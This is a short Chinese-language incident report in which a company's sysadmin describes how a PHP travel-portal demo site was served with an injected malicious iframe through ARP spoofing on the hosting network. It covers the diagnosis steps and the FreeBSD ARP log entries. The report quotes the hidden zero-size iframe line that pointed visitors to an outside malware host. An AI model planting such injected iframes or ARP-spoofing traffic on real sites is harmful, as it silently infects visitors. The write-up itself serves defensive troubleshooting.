上周公司产品川铎旅游门户系统[cdtour.bbwps.com]演示站遭遇ARP欺骗挂马,故障解决后维护记要分享:
故障现象:网站程序是PHP开发的,被挂马后一浏览就显示乱码,查看HTML源代码,第一行被强行加了代码:<iframe src=http://xxx.hao1680.com/xx.htm?id=007 width=0 height=0></iframe> 。上次遇见的挂马是JS代码,先按照上次故障解决思路做了调整:
1、分别检查apache、PHP系统是否有打开压缩输出,上次的JS挂马就是启动apache压缩输出修复;但这次的iframe挂马再用这招没有作用。当时还没有想到是ARP欺骗挂马,把apache、PHP都做了版本升级,发现还是挂马,于是在同事提示下,换个检查思路。
2、公司服务器采用的FreeBSD系统,安装上lynx文本浏览器:
1)从托管在另一家运营商的服务器远程浏览被挂马站点,获读反馈的显示依然有挂马代码;
2)在被挂马服务器上lynx浏览自身,内容显示正常,证明服务器自身系统及内容是正常的,数据经过所在网段网关后被加了代码;
3)查看系统日志,tail -f /var/log/messages,连续不断的重复以下内容:
Jan 3 15:48:07 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:15:60:96:d4:35 to 00:18:74:2f:3r:99 on em0
Jan 3 15:48:07 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:18:74:2f:3r:99 to 00:15:60:96:d4:35 on em0
Jan 3 15:48:09 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:15:60:96:d4:35 to 00:18:74:2f:3r:99 on em0
Jan 3 15:48:09 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:18:74:2f:3r:99 to 00:15:60:96:d4:35 on em0
Jan 3 15:48:16 bbwps kernel: arp: xx.xx.xxx.xxx moved from 00:15:60:96:d4:35 to 00:18:74:2f:3r:99 on em0
其中xx.xx.xxx.xxx是服务器所在网络的网关地址,于是联系机房提供信息,机房断掉某台托管设备后挂马问题解决。